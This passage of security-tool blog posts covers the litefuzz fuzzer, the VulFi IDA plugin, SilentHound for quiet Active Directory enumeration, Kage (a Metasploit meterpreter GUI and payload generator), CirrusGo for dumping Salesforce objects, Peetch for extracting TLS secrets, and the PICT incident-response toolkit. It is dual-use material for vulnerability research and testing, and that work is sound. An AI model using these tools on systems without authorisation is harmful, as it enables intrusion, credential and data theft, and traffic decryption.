note: -z here enables Guard Malloc heap error checking in order to detect subtle heap corruption bugs

mac note

Some GUI targets may fail to be killed after each iteration's timeout and become unresponsive. To mitigate this, you can run a script that looks like this in another terminal to just periodically kill them in batch to reduce manual effort and monitoring, else the fuzzing process may be affected.

$ cat pkill.sh
#!/bin/bash
# kill all processes whose command line matches the pattern passed as $1
ps -Af | grep -ie "$1" | awk '{print $2}' | xargs kill -9

$ while :; do ./pkill.sh "Process Name /Users/test"; sleep 360; done

/Users/test (an example of the first part of the path where temp files are passed to the local GUI app; FUZZ becomes a path during execution) was chosen because you need a unique string to match the processes to kill: if you only use the Process Name, the script will also kill the fuzzing process, since its command line contains the Process Name too.

enumerating file handlers on Windows

Using the AssocQueryString script along with the assoc command, file extensions can be mapped to their default applications.

C:\> .\AssocQueryString.ps1
...
.hlp :: C:\Windows\winhlp32.exe
.hta :: C:\Windows\SysWOW64\mshta.exe
.htm :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.html :: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
.icc :: C:\Windows\system32\colorcpl.exe
.icm :: C:\Windows\system32\colorcpl.exe
.imesx :: C:\Windows\system32\IME\SHARED\imesearch.exe
.img :: C:\Windows\Explorer.exe
.inf :: C:\Windows\system32\NOTEPAD.EXE
.ini :: C:\Windows\system32\NOTEPAD.EXE
.iso :: C:\Windows\Explorer.exe

When fuzzing on Windows, you may want to enable PageHeap and Memory Dumps for a better fuzzing experience (unless your target doesn't like them) prior to starting a new fuzzing run.

sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -z

sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump

Yes, run these commands using (g)sudo on Windows to easily elevate to Admin from the console and make the registry changes needed for these features. This also illustrates another nuance of enabling malloc debuggers for targets: on Linux and Mac, we're using runtime environment flags which need to be passed every time to enable the feature. On Windows, we're modifying the registry, so once it's been passed the first time, one doesn't need to pass -z or --memdump in the fuzzing command line again (except to disable or re-enable them).

fuzz PuTTY (puttygen) (Windows)

litefuzz -l -c "C:\Program Files (x86)\WinSCP\PuTTY\puttygen.exe FUZZ" -i input\ppk -x 0.5 -n 100000 -z

fuzz Adobe Reader like back in the day (Windows GUI)

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -i pdfs -x 3 -n 100000 -z

(WinAppDbg only supports python 2, so must use py2 on Windows)

note: reminder that you can enable PageHeap for the target app via -z in an elevated prompt, or by using the sudo command provided by the gsudo win32 package that was installed during setup

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -z

client

quick look

litefuzz -lk -c "ssh -T [email protected] -p 2222" -a tcp://localhost:2222 -i input/ssh-cli -o crashes/ssh -p -n 250000 -z glibc
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 9404
cmdline: ssh -T test@localhost -p 2222
address: tcp://localhost:2222
crash dir: crashes/ssh
input dir: input/ssh-cli
inputs: 4
iterations: 250000
mutator: random(mutators)

@ 73/250000 (0 crashes, 0 duplicates, ~1 day, 0:21:01 remaining)^C

resume? (y/n)> n
Terminated
...

cat /tmp/litefuzz/out
padding error: need 57895 block 8 mod 7
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect

local client

fuzz SNMP client on the localhost (Linux)

litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3

remote client

fuzz a remote FTP client (Linux)

while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done

litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -n 100

note: depending on the target, client fuzzing may require listening on a privileged port (1-1024). In this case, on Linux you can either setcap cap_net_bind_service=+ep on the python interpreter or use sudo when running the fuzzer; on Mac just use sudo; and on Windows you can run the fuzzer as Administrator to avoid any Permission Denied errors.

server

quick look

litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 4001
cmdline: ./sc_serv shoutcast.conf
address: tcp://localhost:8000
crash dir: crashes/shoutcast
input dir: input/shoutcast
inputs: 3
iterations: 1000
mutator: random(mutators)

@ 1000/1000 (1 crashes, 7 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (1000) iterations with (1) unique crashes and 7 dups
>> check crashes/shoutcast for more details

local server

fuzz a local Shoutcast server

litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z

remote server

fuzz a remote SMTP server

litefuzz -s -a tcp://10.0.0.11:25 -i input/smtp-req -pp -n 10000

command line

usage: litefuzz.py [-h] [-l] [-k] [-s] [-c CMDLINE] [-i INPUTS] [-n ITERATIONS] [-x MAXTIME] [--mutator MUTATOR] [-a ADDRESS] [-o CRASHDIR] [-t TEMPDIR] [-f FUZZFILE]
[-m MINFILE] [-mm SUPERMIN] [-r REPROFILE] [-e] [-p] [-pp] [-u] [--nofuzz] [--key KEY] [--click] [--tls] [--golang] [--attach ATTACH] [--cmd CMD]
[--rmfile RMFILE] [--reportcrash REPORTCRASH] [--memdump] [--nomemdump] [-z [MALLOC]] [-zz] [-d]

optional arguments:
-h, --help show this help message and exit
-l, --local target will be executed locally
-k, --client target a network client
-s, --server target a network server
-c CMDLINE, --cmdline CMDLINE
target command line
-i INPUTS, --inputs INPUTS
input directory or file
-n ITERATIONS, --iterations ITERATIONS
number of fuzzing iterations (default: 1)
-x MAXTIME, --maxtime MAXTIME
timeout for the run (default: 1)
--mutator MUTATOR, --mutator MUTATOR
mutator to use for fuzzing (default: 0=random)
-a ADDRESS, --address ADDRESS
server address in the ip:port format
-o CRASHDIR, --crashdir CRASHDIR
specify the directory to output crashes (default: crashes)
-t TEMPDIR, --tempdir TEMPDIR
specify the directory to output runtime fuzzing artifacts (default: OS tmp + run dir)
-f FUZZFILE, --fuzzfile FUZZFILE
specify the path and filename to place the fuzzed file (default: OS tmp + run dir + fuzz_random.ext)
-m MINFILE, --minfile MINFILE
specify a crashing file to generate a minimized version of it (bonus: may also find variant bugs)
-mm SUPERMIN, --supermin SUPERMIN
loop minimization over and over until no more bytes can be removed
-r REPROFILE, --reprofile REPROFILE
specify a crashing file or directory to replay on the target
-e, --reuse enable second round fuzzing where any crashes found are reused as inputs
-p, --multibin use multiple requests or responses as inputs for fuzzing simple binary network sessions
-pp, --multistr use multiple requests or responses within input for fuzzing simple string-based network sessions
-u, --insulate only execute the target once and inside a debugger (eg. interactive clients)
--nofuzz, --nofuzz send input as-is without mutation (useful for debugging)
--key KEY, --key KEY send a particular key every iteration for interactive targets (eg. F5 for refresh)
--click, --click click the mouse (eg. position the cursor over target button to click beforehand)
--tls, --tls enable TLS for network fuzzing
--golang, --golang enable fuzzing of Golang binaries
--attach ATTACH, --attach ATTACH
attach to a local server process name (mac only)
--cmd CMD, --cmd CMD execute this command after each fuzzing iteration (eg. umount /Volumes/test.dir)
--rmfile RMFILE, --rmfile RMFILE
remove this file after every fuzzing iteration (eg. target won't overwrite output file)
--reportcrash REPORTCRASH, --reportcrash REPORTCRASH
use ReportCrash to help catch crashes for a specified process name (mac only)
--memdump, --memdump enable memory dumps (win32)
--nomemdump, --nomemdump
disable memory dumps (win32)
-z [MALLOC], --malloc [MALLOC]
enable malloc debug helpers (free bugs, but perf cost)
-zz, --nomalloc disable malloc debug helpers (eg. pageheap)
-d, --debug Turn on debug statements

trophies

Litefuzz has fuzzed crashes out of various software packages such as...

  • antiword
  • AppleScript (OS X)
  • ArangoDB VelocyPack
  • Avast authenticode-parser
  • Avast RetDec
  • BBC Audio Waveform
  • ColorSync (OS X)
  • Dynamsoft BarcodeReader
  • eot2ttf
  • evernote2md
  • faad2
  • Facebook's Origami Studio
  • FontForge
  • ForestDB
  • Gifsicle
  • GPUJPEG
  • GPAC Multimedia Framework
  • Google Draco
  • GoPro GPR
  • GtkRadiant
  • IIPImage Server
  • John The Ripper
  • Kyoto Cabinet
  • latex2rtf
  • libMeshb
  • libembroidery
  • libsndfile
  • Lion Vector Graphics (lvg)
  • L-SMASH
  • MindNode
  • minimp4
  • MiniWeb Server
  • MLpack
  • Nvidia Data Center GPU Manager
  • Numbers (OS X)
  • OpenJPEG
  • OpenOrienteering Mapper
  • OSM Express
  • Pages (OS X)
  • PBRT-Parser
  • Pixar USD
  • Remote Apple Events (OS X)
  • Samsung rlottie
  • Samsung ThorVG
  • Shoutcast Server
  • Silo
  • syslog (OS X)
  • Tencent NCNN
  • TinyXML2
  • UEFITool
  • Ulfius Web Framework
  • zlib

FAQ

how did this project come about?

Fuzzing is fun! And it's nice to do projects which take a contrarian view: fuzzers don't always have to follow the modern or popular approaches to reach the end goal of finding bugs. Whether you're close to bare metal, chasing code coverage across all paths, or simply optimizing for the fast and flexible, it's all the same fundamental "invalidating assumptions" way of doing things. However it manifests, enjoy it.

is this project actively maintained?

Please do not expect active support or maintenance on the project. Feel free to fork it to add new features or fix bugs, etc. Perhaps even open a PR for smaller things, although please have no expectations for responses or troubleshooting. Active development on this repo is not intended.

how do you know the fuzzer is working well and did you measure it against others?

The purpose of Litefuzz is to find bugs across platforms. And it does. So, honestly the ability to measure it against fuzzerX or fuzzerY just didn't make the cut. Certain trade-offs were made and acknowledged at inception, see the #intro for more details.

what would you change if you were to re-write it today?

It works pretty well as it is and has been tested on a ton of different targets and scenarios. That being said, it could benefit from standardizing on a more modular, plugin-based system where switching between targets and platforms didn't require as many additional checks in the operational side of the code. Of course, having more formal tests and a deployment system that exercises it across the supported operating systems would create an environment that is easier to work in when making changes to core functions. It grew from a small yet ambitious project into something a little bigger pretty quickly.

how stable is litefuzz?

The command line, GUI, network fuzzing (mostly on Linux and Mac), minimization, etc have been tested pretty thoroughly and should be pretty solid overall. Some of the more exotic features, such as insulated network GUI fuzzing, ReportCrash support on Mac and some other niche features, should be considered experimental.

are there unsupported scenarios for litefuzz?

A few of them, yes. Most are either uncommon scenarios that are buggy, things that required more time and research to "get right", or things that just don't quite work for platform-related reasons. Many of them explicitly exit with an "unsupported" message when you try to run with such options, and some caveats have been mentioned in the sections above when describing various features. Some of the more nuanced ones: repro mode on insulated apps isn't supported; there's been limited testing of Mac apps using the insulate feature; Pyautogui seems to work fine on Linux and Windows but didn't prove very reliable on Mac, so consider it functionally unsupported there; and client fuzzing on Windows can be a little less reliable than other modes on other platforms.

There may be some edge cases here and there, but the most common local and network fuzzing scenarios have been tested and are working. Ah, these are the joys of writing cross-platform tooling: rewarding, but it's hard to make everything work great all the time. Overall, fuzzing on Linux/Mac is more stable and supports more features, especially as network fuzzing has had much more testing there than on the Windows platform, but an effort was made for at least the basics to be available on Win32 with a couple of extras.

Feel free to fork this fuzzer and make such improvements, support the currently unsupported, etc or PRs for more minor but useful stuff.

what guarantees are given for this project or its code?

Absolutely none. But it's pretty fun to fuzz and watch it hand you bugs.

author / references



VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries

By: Zion3R
26 April 2022 at 21:30


The VulFi (Vulnerability Finder) tool is a plugin for IDA Pro which can be used to assist during bug hunting in binaries. Its main objective is to provide a single view with all cross-references to the most interesting functions (such as strcpy, sprintf, system, etc.). For cases where the Hex-Rays decompiler can be used, it will attempt to rule out calls to these functions which are not interesting from a vulnerability research perspective (think something like strcpy(dst,"Hello World!")). Without the decompiler, the rules are much simpler (to avoid depending on the architecture) and thus only rule out the most obvious cases.


Installation

Place the vulfi.py, vulfi_prototypes.json and vulfi_rules.json files in the IDA plugin folder (cp vulfi* <IDA_PLUGIN_FOLDER>).

Preparing the Database File

Before you run VulFi, make sure that you have a good understanding of the binary that you work with. Try to identify all standard functions (strcpy, memcpy, etc.) and name them accordingly. The plugin is case insensitive and thus MEMCPY, Memcpy and memcpy are all valid names. However, note that the search for the function requires an exact match. This means that memcpy? or std_memcpy (or any other variant) will not be detected as a standard function and therefore will not be considered when looking for potential vulnerabilities. If you are working with an unknown binary you need to set the compiler options first (Options > Compiler). After that, VulFi will do its best to filter out all obvious false positives (such as a call to printf with a constant string as the first parameter). Please note that while the plugin is made without any ties to a specific architecture, some processors do not have full support for specifying types, and in such cases VulFi will simply mark all cross-references to potentially dangerous standard functions to allow you to proceed with manual analysis. In these cases, you can benefit from the tracking features of the plugin.

Usage

Scanning

To initiate the scan, select Search > VulFi option from the top bar menu. This will either initiate a new scan, or it will read previous results stored inside the idb/i64 file. The data are automatically saved whenever you save the database.

Once the scan is completed, or once the previous results are loaded, a table will be presented with a view containing the following columns:

  • IssueName - Used as a title for the suspected issue.
  • FunctionName - Name of the function.
  • FoundIn - The function that contains the potentially interesting reference.
  • Address - The address of the detected call.
  • Status - The review status, initial Not Checked is assigned to every new item. The other statuses are False Positive, Suspicious and Vulnerable. Those can be set using a right-click menu on a given item and should reflect the results of the manual review of the given function call.
  • Priority - An attempt to prioritize more interesting calls over the less interesting ones. Possible values are High, Medium and Low. The priorities are defined along with other rules in vulfi_rules.json file.
  • Comment - A user defined comment for the given item.

In case there are no data inside the idb/i64 file, or the user decides to perform a new scan, the plugin will ask whether it should run the scan using the default included rules or a custom rules file. Please note that running a new scan over already existing data does not overwrite previously found items identified by a rule with the same name as one used for the stored results. Therefore, running the scan again does not delete existing comments and status updates.

In the right-click context menu within the VulFi view, you can also remove the item from the results or remove all items. Please note that any comments or status updates will be lost after performing this operation.

Investigation

Whenever you would like to inspect a detected instance of a possibly vulnerable function call, just double-click anywhere in the desired row and IDA will take you to the memory location which was identified as potentially interesting. Using right-click and the option Set Vulfi Comment allows you to enter a comment for the given instance (to justify its status, for example).

Adding More Functions

The plugin also allows for creating custom rules. These rules could be defined in the IDA interface (ideal for single functions) or supplied as a custom rule file (ideal for rules that aim to cover multiple functions).

Within the Interface

When you would like to trace a custom function, which was identified during the analysis, just switch the IDA View to that function, right-click anywhere within its body and select Add current function to VulFi.

Custom Set of Rules

It is also possible to load a custom file with set of multiple rules. To create a custom rule file with the below structure you can use the included template file here.

[   // An array of rules
{
"name": "RULE NAME", // The name of the rule
"alt_names":[
"function_name_to_look_for" // List of all function names that should be matched against the conditions defined in this rule
],
"wrappers":true, // Look for wrappers of the above functions as well (note that the wrapped function has to also match the rule)
"mark_if":{
"High":"True", // If evaluates to True, mark with priority High (see Rules below)
"Medium":"False", // If evaluates to True, mark with priority Medium (see Rules below)
"Low": "False" // If evaluates to True, mark with priority Low (see Rules below)
}
}
]

An example rule that looks for all cross-references to the function malloc and checks whether its parameter is not constant and whether the return value of the function is checked is shown below:

{
"name": "Possible Null Pointer Dereference",
"alt_names":[
"malloc",
"_malloc",
".malloc"
],
"wrappers":false,
"mark_if":{
"High":"not param[0].is_constant() and not function_call.return_value_checked()",
"Medium":"False",
"Low": "False"
}
}

Rules

Available Variables

  • param[<index>]: Used to access the parameter to a function call (index starts at 0)
  • function_call: Used to access the function call event
  • param_count: Holds the count of parameters that were passed to a function

Available Functions

  • Is parameter a constant: param[<index>].is_constant()
  • Get numeric value of parameter: param[<index>].number_value()
  • Get string value of parameter: param[<index>].string_value()
  • Is parameter set to null after the call: param[<index>].set_to_null_after_call()
  • Is return value of a function checked: function_call.return_value_checked(<constant_to_check>)

Examples

  • Mark all calls to a function where third parameter is > 5: param[2].number_value() > 5
  • Mark all calls to a function where the second parameter contains "%s": "%s" in param[1].string_value()
  • Mark all calls to a function where the second parameter is not constant: not param[1].is_constant()
  • Mark all calls to a function where the return value is validated against the value that is equal to the number of parameters: function_call.return_value_checked(param_count)
  • Mark all calls to a function where the return value is validated against any value: function_call.return_value_checked()
  • Mark all calls to a function where none of the parameters starting from the third are constants: all(not p.is_constant() for p in param[2:])
  • Mark all calls to a function where any of the parameters are constant: any(p.is_constant() for p in param)
  • Mark all calls to a function: True
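Putting the rule structure and these expressions together, a hypothetical custom rule that flags command-injection sinks whose first argument is not a constant could look like the following (the alt_names are illustrative and should match how the functions are actually named in your database):

[
{
"name": "Possible Command Injection",
"alt_names":[
"system",
"_system",
".system",
"popen"
],
"wrappers":true,
"mark_if":{
"High":"not param[0].is_constant()",
"Medium":"False",
"Low": "False"
}
}
]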

Issues and Warnings

  • When you request a parameter with an index that is out of bounds, any call to the function will be marked as Low priority. This is a way to avoid missing cross-references where it was not possible to correctly get all parameters (this mainly applies to disassembly mode).
  • When you search within the VulFi view and change context out of the view and come back, the view will not load. You can solve this either by terminating the search operation before switching the context, moving the VulFi view to the side-view so that it is always visible or by closing and re-opening the view (no data will be lost).
  • Scans for more exotic architectures end with a lot of false positives.


SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.

By: Zion3R
1 August 2022 at 12:30


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd SilentHound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP password - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.

Using the -o flag will result in output files for each section normally in stdout. The files created using all flags will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali 60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali 89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali 66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali 529 Jun 30 11:37 BASENAME-users.txt
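For reference, a hypothetical run that exercises all of the above flags (placeholder DC IP, domain, credentials and output basename) could look like:

pipenv run python silenthound.py -u 'bob dole' -p 'Password1!' -o BASENAME -g -n -k 10.0.0.5 ACME.com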

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler

By: Zion3R
3 August 2022 at 12:30

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter & android/meterpreter.


Getting Started

Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites

Installing

You can install Kage binaries from here.

for developers

to run the app from source code:

# Download source code
git clone https://github.com/WayzDev/Kage.git

# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev

# to build project
yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

To generate an APK payload, select the Raw format in the dropdown list.

Screenshots







Disclaimer

I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.

Twitter: @iFalah

Email: [email protected]

Credits

Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License)
http://www.metasploit.com/

node-msfrpc - (c) Tomas Gonzalez Vivo. 2017 (Apache License)
https://github.com/tomasgvivo/node-msfrpc

electron-vue - (c) Greg Holguin. 2016 (MIT)
https://github.com/SimulatedGREG/electron-vue


This project was generated with electron-vue using vue-cli. Documentation about the original structure can be found here.



Cirrusgo - A Fast Tool To Scan SAAS, PAAS App Written In Go

By: Zion3R
4 August 2022 at 12:30


A fast tool to scan SaaS and PaaS apps, written in Go.

SAAS App Support :

  • salesforce
  • contentful (next version)

Note: the -o output flag is not working.

install: requires golang 1.18

go install -v github.com/Ph33rr/cirrusgo/cmd/cirrusgo@latest
or
go install -v github.com/Ph33rr/CirrusGo/cmd/cirrusgo@latest


Help:

cirrusgo --help
  ______ _                           ______
/ ____/(_)_____ _____ __ __ _____ / ____/____
/ / / // ___// ___// / / // ___// / __ / __ \
/ /___ / // / / / / /_/ /(__ )/ /_/ // /_/ /
\____//_//_/ /_/ \__,_//____/ \____/ \____/ v0.0.1

cirrusgo --help

-u, --url <URL> Define single URL to fuzz
-l, --list Show App List
-c, --check only check endpoint
-V, --version Show current version
-h, --help Display its help

[cirrusgo [app] [options] ..]
cirrusgo salesforce --help

-u, --url <URL> Define single URL
-c, --check only check endpoint
-lobj, --listobj pull the object list.
-gobj --getobj pull the object.
-obj --objects set the object name. Default value is "User" object.
Juicy Objects: Case,Account,User,Contact,Document,Cont
entDocument,ContentVersion,ContentBody,CaseComment,Not
e,Employee,Attachment,EmailMessage,CaseExternalDocumen
t,Attachment,Lead,Name,EmailTemplate,EmailMessageRelation
-gre --getrecord pull the Record id.
-re --recordid set the recode id to dump the record
-cw --chkWritable check all Writable objects
-f, --full dump all pages of objects.
--dump
-H, --header <HEADER> Pass custom header to target
-proxy, --proxy <URL> Use proxy to fuzz

-o, --output <FILE> File to save results

[flags payload]
[command: cirrusgo salesforce --payload options]
-payload, --payload Generator payload for test manual Default "ObjectList"

GetItems -obj set object
-page set page
-pages set pageSize
GetRecord -re set recoder id
WritableOBJ -obj set object
SearchObj -obj set object
-page set page
-pages set pageSize
AuraContext -fwuid set UID
-App set AppName
-markup set markup
ObjectList no options
Dump no options
-h, --help Display its help

Example :

cirrusgo salesforce -u https://localhost -gobj

dump:

cirrusgo salesforce -u https://localhost/ -f

check Writable Objects:

cirrusgo salesforce -u https://localhost/ -cw



Peetch - An eBPF Playground

By: Zion3R
5 August 2022 at 12:30


peetch is a collection of tools aimed at experimenting with different aspects of eBPF to bypass TLS protocol protections.

Currently, peetch includes two subcommands. The first, called dump, aims to sniff network traffic, associating information about the source process with each packet. The second, called tls, allows identifying processes that use OpenSSL and extracting their cryptographic keys.

Combined, these two commands make it possible to decrypt TLS exchanges recorded in the PCAPng format.


Installation

peetch relies on several dependencies, including non-merged modifications of bcc and Scapy. A Docker image can easily be built in order to test peetch using the following command:

docker build -t quarkslab/peetch .

Commands Walk Through

The following examples assume that you used the following command to enter the Docker image and launch examples within it:

docker run --privileged --network host --mount type=bind,source=/sys,target=/sys --mount type=bind,source=/proc,target=/proc --rm -it quarkslab/peetch

dump

This sub-command gives you the ability to sniff packets using an eBPF TC classifier and to retrieve the corresponding PID and process names with:

peetch dump
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https S / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 SA / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https A / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https PA / Raw / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 A / Padding

Note that for demonstration purposes, dump will only capture IPv4 based TCP segments.

For convenience, the captured packets can be stored to PCAPng along with process information using --write:

peetch dump --write peetch.pcapng
^C

This PCAPng can easily be manipulated with Wireshark or Scapy:

scapy
>>> l = rdpcap("peetch.pcapng")
>>> l[0]
<Ether dst=00:1c:42:00:00:18 src=00:1c:42:54:f3:34 type=IPv4 |<IP version=4 ihl=5 tos=0x0 len=60 id=11088 flags=DF frag=0 ttl=64 proto=tcp chksum=0x4bb1 src=10.211.55.10 dst=208.97.177.124 |<TCP sport=53054 dport=https seq=631406526 ack=0 dataofs=10 reserved=0 flags=S window=64240 chksum=0xc3e9 urgptr=0 options=[('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1272423534, 0)), ('NOP', None), ('WScale', 7)] |<Padding load='\x00\x00' |>>>>
>>> l[0].comment
b'curl/1289909'

tls

This sub-command aims at identifying processes that use OpenSSL and makes it possible to dump several things like plaintext and secrets.

By default, peetch tls will only display one line per process; the --directions argument makes it possible to display the exchanged messages:

peetch tls --directions
<- curl (1291078) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256
-> curl (1291078) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

Displaying OpenSSL buffer content is achieved with --content.

peetch tls --content
<- curl (1290608) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

0000 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..
0010 48 6F 73 74 3A 20 77 77 77 2E 70 65 72 64 75 2E Host: www.perdu.
0020 63 6F 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A com..User-Agent:
0030 20 63 75 72 6C 2F 37 2E 36 38 2E 30 0D 0A 41 63 curl/7.68.0..Ac

-> curl (1290608) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

0000 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
0010 0A 44 61 74 65 3A 20 54 68 75 2C 20 31 39 20 4D .Date: Thu, 19 M
0020 61 79 20 32 30 32 32 20 31 38 3A 31 36 3A 30 31 ay 2022 18:16:01
0030 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Server: Ap

The --secrets argument will display TLS Master Secrets extracted from memory. The following example leverages --write to write master secrets to disk to simplify decrypting TLS messages with Scapy:

$ (sleep 5; curl https://www.perdu.com/?name=highly%20secret%20information --tls-max 1.2 --http1.1) &

# peetch tls --write &
curl (1293232) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

# peetch dump --write traffic.pcapng
^C

# Add the master secret to a PCAPng file
$ editcap --inject-secrets tls,1293232-master_secret.log traffic.pcapng traffic-ms.pcapng

$ scapy
>>> load_layer("tls")
>>> conf.tls_session_enable = True
>>> l = rdpcap("traffic-ms.pcapng")
>>> l[13][TLS].msg
[<TLSApplicationData data='GET /?name=highly%20secret%20information HTTP/1.1\r\nHost: www.perdu.com\r\nUser-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n' |>]

Limitations

By design, peetch only supports OpenSSL and TLS 1.2.



Pict - Post-Infection Collection Toolkit

By: Zion3R
6 August 2022 at 12:30


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without them.

Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second are complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one required parameter, which passes in a configuration file in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:
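Based on the keys described below, a minimal configuration sketch might look like this (the module and class names under collectors, and all values, are illustrative placeholders):

{
"collection_dest": "~/pict-data",
"all_users": true,
"collectors": {
"browser": "BrowserCollector"
},
"unused": {
},
"settings": {
"keepLSData": false,
"zipIt": true
},
"moduleSettings": {
"browser": {
"collectArtifacts": true
}
}
}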

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

